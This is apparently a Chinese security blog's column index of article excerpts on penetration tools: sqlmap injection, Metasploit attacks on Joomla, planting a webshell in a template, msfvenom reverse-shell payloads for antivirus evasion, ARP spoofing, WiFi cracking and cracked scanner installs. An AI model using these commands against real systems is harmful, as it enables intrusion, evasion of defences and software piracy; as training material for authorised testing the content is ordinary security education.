
web安全工具库
web安全工具库
这个作者很懒,什么都没留下…
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
爆破、批量PoC扫描工具 -- POC-T
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。脚本调用框架,用于渗透测试中 采集|爬虫|爆破|批量PoC 等需要并发的任务。原创 2024-04-19 11:50:03 · 521 阅读 · 1 评论 -
小白学习Cobalt Strike4.5(一)
双击批处理文件Cobalt_Strike_CN,弹出这个对话框,填写相关内容,主机就是上面服务器的地址,端口就是箭头指向的那个端口号,用户随便起个名字即可,密码就是服务器后面跟着那个密码,点击连接。1、客户端程序:Cobalt_Strike_CN,可以启动多个客户端,相互共享重要数据。2、服务端程序:teamserver,只能启动一个,客户端都需要连接该服务器。在终端运行下面命令,如果是root权限可以无视sudo,启动客户端,点击连接。运行下面命令启动服务端,root权限可以无视sudo。...原创 2022-08-17 10:11:23 · 2748 阅读 · 0 评论 -
Windows提权辅助工具
一、在线网址https://i.hacking8.com/tiquan二、使用方法1、通过systeminfo命令获取信息,并导入到一个txt文件systeminfo>1.txt2、将内容复制到网页,点击查询3、查询可利用的漏洞禁止非法,后果自负欢迎关注公众号:web安全工具库欢迎关注视频号:之乎者也吧...原创 2022-02-06 08:22:45 · 3525 阅读 · 0 评论 -
WAF绕过 -- and判断
一、环境2、Pikachu靶机3、安全狗最新版二、BurpSuite2022抓包,点击获取下载地址1、正常访问结果2、抓取POST包,并修改,加入and 1=1,提示被拦截POST /pikachu/vul/sqli/sqli_id.php HTTP/1.1Host: localhostContent-Length: 21Cache-Control: max-age=0sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"原创 2022-01-30 12:08:40 · 1332 阅读 · 1 评论 -
BurpSuite2022.1(分块传输)
一、抓包,发送到Repeater模块二、添加header信息,告诉服务器是分块传输Transfer-Encoding: chunked三、修改POST数据,将数据分割,有几个字符,在上面表明是几,最后以0结尾,再加上两个回车Transfer-Encoding: chunked2id2=11&6submit2=10四、发送数据,和分割前的结果一样禁止非法,后果自负欢迎关注公众号:web安全工具库欢迎关注视频号:之乎者也吧...原创 2022-01-29 11:03:31 · 2127 阅读 · 0 评论 -
网络安全单兵工具 -- YAKIT
网络安全单兵工具 -- YAKIT一、下载及安装1、原作者及下载地址https://github.com/yaklang/yakit2、双击下载好的exe文件,点击核心引擎安装与升级3、点击意见更新Yak引擎4、以管理员启动5、点击连接引擎二、使用方法1、扫描端口/指纹2、爆破与未授权3、专项漏洞检查禁止非法,后果自负欢迎关注公众号:web安全工具库欢迎关注视频号:之乎者也吧...原创 2022-01-28 09:24:49 · 29860 阅读 · 0 评论 -
解决BurpSuite2021.12乱码问题
一、抓包分析,响应包里有乱码二、选择User Options选项卡,选择Display,将字体调为宋体或楷体,字体大小最好为8的倍数三、重新查看响应包关注公众号回复Burp12,获取该版本下载地址禁止非法,后果自负欢迎关注公众号:web安全工具库欢迎关注视频号:之乎者也吧...原创 2022-01-27 08:22:48 · 5805 阅读 · 0 评论 -
子域名在线扫描 -- dnsdumpster
DNSdumpster.com 是一个免费的域名研究工具,可以发现与域名相关的主机。从攻击者的角度查找可见的主机是安全评估过程的重要组成部分。这是一个“hackertarget.com”项目。1、访问网址,输入要查询的域名信息,点击搜索https://dnsdumpster.com/2、查看DNS服务器3、查看邮件服务器4、查看子域名5、查看子域名开放的端口,点击狙击的那个标致,跳转到另一个网页,再点击快速扫描。Starting Nmap 7.40 (原创 2022-01-25 22:37:47 · 4206 阅读 · 0 评论 -
漏洞批量验证框架 -- BLEN
漏洞批量验证工具一、原作者及软件下载地址:https://github.com/openx-org/BLEN二、使用方法1、下载到本地解压,运行blen.py获取帮助信息python3 blen.pyusage: python3 Blen.py -f [target_path] / -u [url] -s [poc_path] --thread 50 python3 Blen.py --fofa-searchBlen framewark of PO原创 2022-01-23 10:28:07 · 1659 阅读 · 0 评论 -
信息收集 -- JBoss架构
一、目录结构1、home文件夹bin:该目录包含所有入口点Java包(Java Archives, JAR)和脚本,包括启动和关闭。client:该目录存储可能由外部Java客户端应用使用的配置文件。commion:该目录包含所有服务端的通用JAR包及配置文件。docs:该目录包含JBoss文档及模式(schema),它们在开发过程中非常有用。lib:该目录包含JBoss启动所需的所有JAR包。server:该目录包含与不同服务器配置相关的文件,包括正式环境和测试环境。2、/原创 2021-11-01 08:55:58 · 244 阅读 · 0 评论 -
信息收集 -- Drupal网站
一、网站目录1、Core:包括Drupal默认安装时所使用的文件2、Modules:在Drupal中的所有自定义创建的模块都将存储这里。3、Profiles:此文件夹存储安装配置文件。安装配置文件包含有关预安装模块、主题和给定Drupal站点配置的信息。4、sites:当Drupal与多个站点一起使用时,它包含特定于站点的模块。5、Themes:基本主题和所有其他自定义主题都存储在此目录中。6、Vendors:该目录包含Drupal使用的后端库,例如Symfony。二、Dru原创 2021-10-30 08:21:46 · 515 阅读 · 0 评论 -
图形化渗透测试工具 -- GUI_Tools
感谢利刃信安的无私分享。。。软件获取方式,关注微信公众号web安全工具库,后台回复:20211025一、下载后,解压二、需要用到python的wx模块安装wx模块:pip install -U wxPython三、运行该软件python GUI_Tools.py禁止非法,后果自负欢迎关注公众号:web安全工具库欢迎关注视频号:之乎者也吧...原创 2021-10-26 19:13:12 · 27892 阅读 · 2 评论 -
上传Joomal网站的Shell
一、前言已经获取了后台登录账号和密码二、在面板菜单中,Extensions--Templates三、选择Templates,选择一个模板四、打开index.php,添加我们的木马一句话,点击Save&Close保存五、访问该文件,添加相关参数http://192.168.1.111:8080/templates/protostar/index.php?aiyou=id该系列教程内容参考自华章IT出版的《Web渗透测试实战:基于Metaspl原创 2021-10-25 10:58:55 · 2218 阅读 · 0 评论 -
Metasploit6.0系列教程 -- 渗透Joomla网站
一、使用Metasploit对Joomal进行侦察1、探测版本信息选择joomla_version辅助模块,设置端口号及IP地址,run运行use auxiliary/scanner/http/joomla_versionset rhosts 192.168.1.111set rport 8080run2、页面枚举选择Joomla_pages辅助模块,设置端口号及IP地址,run运行use auxiliary/scanner/http/joomla_pagesset rhos原创 2021-10-19 12:27:09 · 2512 阅读 · 1 评论 -
信息收集 -- WordPress网站
一、WordPress网站文件/目录结构根目录包含三个文件夹,分别是wpadmin, wp-content和wp-includes,以及一堆PHP文件,其中包括一个最重要的文件wp-config.php1. wp-includeswp-includes包含前端使用的所有其他PHP文件和类,以及Wordpress Core所需的类。2. wp-admin包含WordPress仪表板(Dashboard)的文件,这些文件用于执行所有管理任务,如撰写帖子、审核评论以及安装插件和主题。仅允许注册原创 2021-10-14 08:46:22 · 466 阅读 · 0 评论 -
Metasploit6.0系列教程 -- MSF控制台命令
一、启动命令msfconsole二、显示命令:show1、showevasion查看evasion模块包含的内容2、showoptionsuse,选择某模块,然后查看需要设置的参数3、show按两次键盘上的Tab键,显示show可用参数三、设置命令:setset srvport 8888四、可直接执行OS命令五、连接数据库1、初始化msfdbinit2、启动MSF查看数据库状态db_status六、查看...原创 2021-10-10 13:11:42 · 463 阅读 · 0 评论 -
Metasploit6.0系列教程 -- MSF控制台命令
一、启动命令msfconsole二、显示命令:show1、showevasion查看evasion模块包含的内容2、showoptionsuse,选择某模块,然后查看需要设置的参数3、show按两次键盘上的Tab键,显示show可用参数三、设置命令:setset srvport 8888四、可直接执行OS命令五、连接数据库1、初始化msfdbinit2、启动MSF查看数据库状态db_status六、查看...原创 2021-10-09 13:19:35 · 1508 阅读 · 0 评论 -
Metasploit6.0系列教程 -- MSF术语
一、漏洞利用(exploit): Metasploit启动时,会显示框架中已经公开可用的漏洞利用模块的数量。漏洞利用是一段利用漏洞为我们提供所需输出的代码。二、载荷( payload):载荷是一段代码,通过漏洞利用把这段代码传递到目标系统或应用程序以执行我们想要的操作。载荷实际上可以分为三种主要类型: Single, Stager和Stage1、Single:这类载荷是独立的,通常用于执行简单的任务,例如执行notepad.exe文件和添加用户。2、Stager:这类载荷用来在两个系统之间建原创 2021-10-05 11:22:34 · 507 阅读 · 0 评论 -
安卓逆向 -- 自吐算法(3DES和AES)
一、3DES源码String bs= "逆向有你a";DESedeKeySpec des3key = new DESedeKeySpec(("123456781234567812345678".getBytes(StandardCharsets.UTF_8)));//密钥必须是24个字节SecretKeyFactory keydes3 = SecretKeyFactory.getInstance("DESede");SecretKey secretKey3 = keydes3.generateSecr原创 2021-10-05 11:14:59 · 623 阅读 · 0 评论 -
Metasploit Pro -- 模块利用
Metasploit Pro安装与使用https://mp.weixin.qq.com/s?__biz=MzI4MDQ5MjY1Mg==&mid=2247490437&idx=1&sn=b421397185984aa13880d4f65c9935b4&chksm=ebb6f486dcc17d90924163a03c3b726b2c7fe69b27bf192a29f9db2b6939bef26dffea240881&token=2144930201&lang=z原创 2021-10-02 17:54:31 · 1659 阅读 · 0 评论 -
Metasploit Pro 4.20.0安装与使用
一、简介Metasploit Pro 是一种漏洞利用验证工具,UI版的MSF。二、下载地址https://www.rapid7.com/products/metasploit/download/pro/thank-you/三、安装与使用1、运行安装包./metasploit-latest-linux-x64-installer.run,一路Forward2、安装成功,启动3、首次访问:localhost:3790,需要设置账号密码4、选择离线注册,从网上找一个注册原创 2021-09-29 11:47:37 · 1962 阅读 · 0 评论 -
AWVS14.4.2的安装使用
1、双击acunetix_14.4.210913167,一路下一步2、设置登陆的账号密码3、点击安装证书4、双击Acunetix Premium Activation Tool,提示绿化成功5、打开谷歌浏览器:https://localhost:3443/,输入上面申请的账号密码6、点击登录,成功进入五、工具下载方式关注公众号:回复20210920禁止非法,后果自负欢迎关注公众号:web安全工具库欢迎关注视频号:之乎者也吧原创 2021-09-26 10:42:32 · 1353 阅读 · 2 评论 -
BurpSuite2021.8.2版本安装使用
一、安装JDK15,一路下一步,其他JDK版本可能会出问题,压缩包里有提供二、双击运行BurpSuiteLoader,提示输入注册信息三、打开burploader-old,将license信息添加到上面的对话框四、将注册信息复制到上面的对话框中,点击next五、点击Manualactivation,将右边的request复制到左边的request,再将左边response复制到右边的response六、正常启动七、工具下载地址.原创 2021-09-20 14:37:51 · 2354 阅读 · 0 评论 -
蓝队自检工具 -- WindowsVulnScan
一、下载地址(原作者):https://github.com/chroblert/WindowsVulnScan二、使用方法1、搜集目标主机上的漏洞,以管理员身份打开cmd,进入到windowsvulnscan目录2、进入powershell3、设置可运行脚本,set-ExecutionPolicy RemoteSigned4、运行KBCollect.ps15、生成kb.json文件,里面有我们的漏洞信息{"basicInfo":{"windowsProduct原创 2021-09-18 22:36:57 · 1386 阅读 · 2 评论 -
BurpSuite8.2 -- 查找包含id参数的URL
一、通过BurpSuite随便浏览一下目标主机,越多越好二、通过筛选,获取我们想要的相关参数1、在Filterbysearchterm输入筛选词2、勾选showonlyparameterizedrequests,只显示包含id的请求3、勾选HTML,只显示html网页三、直接查看结果禁止非法,后果自负欢迎关注公众号:web安全工具库欢迎关注视频号:之乎者也吧...原创 2021-09-16 18:49:34 · 307 阅读 · 0 评论 -
BurpSuite8.2 -- 查找包含id参数的URL
一、通过BurpSuite随便浏览一下目标主机,越多越好二、通过筛选,获取我们想要的相关参数1、在Filterbysearchterm输入筛选词2、勾选showonlyparameterizedrequests,只显示包含id的请求3、勾选HTML,只显示html网页三、直接查看结果禁止非法,后果自负欢迎关注公众号:web安全工具库欢迎关注视频号:之乎者也吧...原创 2021-09-13 14:38:12 · 470 阅读 · 0 评论 -
Bttercap -- ARP欺骗功能
扛不住的就死扛,能陪你走到最后的就是那个了不起的自己。。。---- 网易云热评一、安装方法1、Kali系统自带Bttercap2、软件下载地址(原作者):https://github.com/bettercap/bettercap/releases/二、环境介绍1、目标主机,IP地址192.168.139.129,网关192.168.139.22、arp列表2、攻击主机,IP地址192.168.139.133三、常用命令1、启动Bttercap.原创 2021-07-08 14:25:30 · 841 阅读 · 1 评论 -
Sqlmap中代理及其他常用参数
岁月静好是片刻,一地鸡毛才是日常。。。---- 网易云热评 一、不指定注入类型,会自动进行多种注入测试sqlmap -u "http://192.168.139.129/sqli/Less-1/?id=1"二、指定注入1、指定联合注入sqlmap -u "http://192.168.139.129/sqli/Less-1/?id=1" --technique U2、指定联合加布尔注入sqlmap -u "http://192.168.139.12...原创 2021-07-08 14:24:42 · 4533 阅读 · 0 评论 -
Sqlmap2021 -- Referer注入
一直向前走,天总会亮的。。。---- 网易云热评一、检测是否存在注入1、通过BurpSuite抓包,将封包内容保存到referer.txtPOST /sqli/Less-19/ HTTP/1.1Host: 192.168.139.129Content-Length: 38Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Origin: http://192.168.139.129Content-Type: a..原创 2021-07-07 14:41:06 · 2277 阅读 · 0 评论 -
Sqlmap2021 -- Cookie注入
喧闹任其喧闹,自有我自为之,我自风情万种,与世无争。。。---- 网易云热评一、检测Cookie注入1、通过BurpSuite抓包,将封包内容保存到1.txtGET /sqli/Less-20/index.php HTTP/1.1Host: 192.168.139.129Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x.原创 2021-07-07 14:40:04 · 4267 阅读 · 0 评论 -
Sqlmap -- POST注入
想归想,难过归难过,若你岁岁平安,我可生生不见。。。---- 网易云热评一、检测是否存在注入1、通过BurpSuite抓包获取提交的数据2、sqlmap -u "http://192.168.139.129/pikachu/vul/sqli/sqli_id.php" --data "id=1&submit=%E6%9F%A5%E8%AF%A2"--data指定提交的数据运行结果:id值存在注入,可能是布尔盲注、报错注入、时间盲注、联合注入[14:37:09]...原创 2021-07-07 14:38:29 · 3377 阅读 · 0 评论 -
Sqlmap是如何GET注入的
人有时候会突然不快乐了突然被记忆力的某个细节揪住突然陷入深深的沉默。。。---- 网易云热评 一、监测是否存在注入sqlmap -u "http://192.168.139.129/sqli/Less-1/?id=1"运行结果:id存在注入,可能存在的类型:报错注入、布尔盲注、时间盲注、联合注入GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)?...原创 2021-07-02 10:21:47 · 2215 阅读 · 1 评论 -
Appscan10.0.4 -- 漏洞扫描
同一个错误不会犯两次,如果犯了,那就不是错误,而是选择。。。---- 网易云热评 一、完全扫描设置1、点击绿色的按钮,选择完全扫描,点击是2、URL和服务器输入我们的目标地址,可以选择仅扫描此目录或者目录下的链接,如果是linux服务器,还可以区分大小写,还可以添加多个服务器3、登录管理,当扫描时遇到需要登录的页面,会自动填写4、环境定义,如果确定服务器的应用程序或数据库类型,可以在这里设置,填写未定义,会自动识别5、排除包含Login的目录及...原创 2021-06-29 16:14:02 · 1196 阅读 · 3 评论 -
Appscan10.0.4 -- 安装中的那些坑(破解)
成年人只管利益,小孩子才分对错。。。---- 网易云热评之乎者也吧#从PHP开始学渗透#GET请求和POST请求@微信时刻@微信创作者视频号 一、GET请求1、get可以理解为一个系统定义好的数组2、通过var_dump看一下GET的类型,浏览器访问网址,后面加上"?aiyou=bucuo",相当与数组名为GET,键是aiyou,值是bucuo3、一般get请求都是访问某个文件4、通过GET写文件<?php$a=$_GE...原创 2021-06-24 09:11:46 · 3287 阅读 · 2 评论 -
2021Kali系列 -- 监控对方图片信息(ettercap)
你明白的,其实你明白的,你只是还没有放过自己。。。---- 网易云热评 环境介绍:1、攻击机kali:192.168.139.1332、目标主机win7:192.168.139.129一、启动ettercap1、ettercap -G2、设置网卡二、获取主机信息1、点击放大镜,搜索本地主机,2、点击列表信息,选择我们要攻击的目标ip3、右击网卡及目标主机ip添加到target1和target24、点击圆球标志,再选择A...原创 2021-05-01 22:18:17 · 2844 阅读 · 3 评论 -
2021kali系列 -- 破解无线密码
其实挺期待的,什么人会爱上真实的我,你会么。。。---- 网易云热评一、插上网卡,选择虚拟机设备,设备连接不到虚拟机,点击编辑,选择首选项二、查看是否连接到无线网卡,邮寄虚拟机的名字,选择可移动设备,无线网卡这有个对勾三、点击这里也会识别到周边的网络四、查看网卡设备1、ifconfig2、查看是否支持监听模式airmon-ng3、开启监听模式airmon-ng start wlan04、查看周围WiFi网络...原创 2021-04-30 08:52:45 · 8663 阅读 · 7 评论 -
2021Kali -- Wireshark解密HTTPS数据包
如果我们,不会和好了,希望你不要当成故事,讲给别人听。。。---- 网易云热评一、安装谷歌浏览器1、下载安装包wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb2、安装gdbitgdebi google-chrome-stable_current_amd64.deb,提示安装gdbit,按y,继续安装3、进入root模式,安装gdebi google-..原创 2021-04-30 08:47:45 · 1767 阅读 · 1 评论 -
2021Kali -- 木马免杀制作
知道为什么梦里的人都看不清脸么?因为怕你当真。。。---- 网易云热评 一、通过MSF生成shellcode1、启动MSF,演示版本是6.0.362、通过msfvenom生成相关代码msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b '\x00' lhost=192.168.139.133 lport=8585 -f c-p:指定payload-e:指定选择使用的编码...原创 2021-04-24 16:20:30 · 4167 阅读 · 3 评论 -
2021Kali系列 -- 漏洞搜索(searchsploit)
我以为我不理你,你会难过,可结果呢,难过的是我。。。---- 网易云热评简介:通过搜索关键词找到需要的漏洞,可以理解为一个离线的漏洞库一、命令searchsploit1、-c --case搜索时区分大小写,默认不区分大小写2、-e --exact 精确搜索,比如:搜索“ WordPress 4.1”时,结果绝对不会出现 “WordPress Core 4.1”3、-s --strict 精确搜索,输入值必须存在4、-t --tittle搜索exploit标题5、-...原创 2021-04-22 15:22:19 · 4722 阅读 · 0 评论 -
2021Kali系列 -- 漏洞检测(wmap/db_nmap)
我反感任何人以一种开玩笑的语气说着我最在意的事。。。---- 网易云热评一、wmap模块0、启动并连接数据库service postgresql start1、加载插件load wmap2、添加站点wmap_sites -a http://192.168.139.1323、列出站点可用的目标wmap_sites -l4、添加目标wmap_targets -t http://192.168.139.1325、测试目标wmap...原创 2021-04-20 20:01:11 · 2596 阅读 · 0 评论